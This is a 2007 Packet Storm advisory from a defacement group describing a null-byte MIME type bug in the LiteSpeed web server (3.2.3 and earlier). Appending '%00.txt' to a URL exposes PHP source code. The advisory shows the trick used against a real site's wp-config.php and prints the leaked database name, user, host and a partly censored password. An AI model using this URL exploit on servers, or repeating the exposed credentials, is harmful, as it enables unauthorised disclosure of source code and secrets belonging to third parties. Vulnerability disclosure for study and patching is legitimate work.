litespeed-disclose.txt

2007-10-22T00:00:00
ID PACKETSTORM:60280
Type packetstorm
Reporter Tr3mbl3r
Modified 2007-10-22T00:00:00

Description

                                        
                                            `########################################################################################  
########### _______ __ _____ ___ __ ###########  
########### |_ _| |--.-----.| \.-----.' _|.---.-.----.-----.--| | ###########  
########### | | | | -__|| -- | -__| _|| _ | __| -__| _ | ###########  
########### |___| |__|__|_____||_____/|_____|__| |___._|____|_____|_____| ###########  
########### ###########  
########### TheDefaced.org ###########  
########### TheDefaced Security Team Presents An 0-day. ###########  
########### LiteSpeed Remote Mime Type Injection ###########  
########### Discovered by:Tr3mbl3r ###########  
########### Shouts to his kitty kats and tacos. ###########  
########################################################################################  
# Product: #  
# LiteSpeed/Discovered in <==3.2.3 Should work in all other versions below. #   
# #  
# Vuln: #  
# Remote Mime Type Injection #  
# #  
# Description: #  
# Litespeed will parse an URL/Files mimetype incorrectly. #  
# When given a nullbyte. #  
# #  
# Patch: #  
# Upgrade to LiteSpeed 3.2.4 has just been released today. #  
# 9:15AM PST OCT 22 When I wrote this it's now 9:30AM PST OCT 22 #  
# #  
# This vuln was found before an update was released they fixed it after they found it..#  
# In their logs. #  
# #  
# Risk: Extremely High #  
########################################################################################  
# Example: #   
# Basicly if you had a URL like so http://www.site.com/index.php. #  
# And you wanted this websites source you could simply add a nullbyte and an extension #  
# Like So http://www.site.com/index.php%00.txt #  
# Litespeed would then at this point asume the file is a txt file. #  
# #  
# Keep in mind that this vuln is Mime Type Injection... so it works with any type. #  
# Like if you did %00.rar it would asume the index.php was a rar file. #  
# Theres a numerous ammount of things you could do. #  
# #  
# As to of why litespeed does this is not confirmed by us just yet. #  
# #  
# I asume it has somthing to do with mimetype handling thus the name of the exploit. #  
# MimeType Injection. #  
########################################################################################  
# An Example of This Vuln being put in to use. #  
# #   
# The Following is WordPress.com's Wp-Config.php #  
# http://wordpress.com/wp-config.php%00.txt #  
########################################################################################  
# ###########  
# <?php #  
# #  
# // This is probably useless? #  
# define('DB_NAME', 'wpmu'); // The name of the database #  
# define('DB_USER', 'wpmu'); // Your MySQL username #  
# define('DB_PASSWORD', 'JTO5T**CENSOR-HERE**'); // ...and password #   
# define('DB_HOST', 'two.wordpress.com'); // 99% chance you won't need to change this value #  
# #  
# require('define.php'); #   
# #  
# require(ABSPATH . 'wpmu-settings.php'); #  
# #   
# ?> #  
# #  
##################################################################################################  
# Contact Us #  
##################################################################################################  
# WebSite: http://www.thedefaced.org #  
# Forums for more info: http://www.thedefaced.org/forums/ #  
# IRC: irc.thedefaced.org/#TheDefaced #  
##################################################################################################  
  
`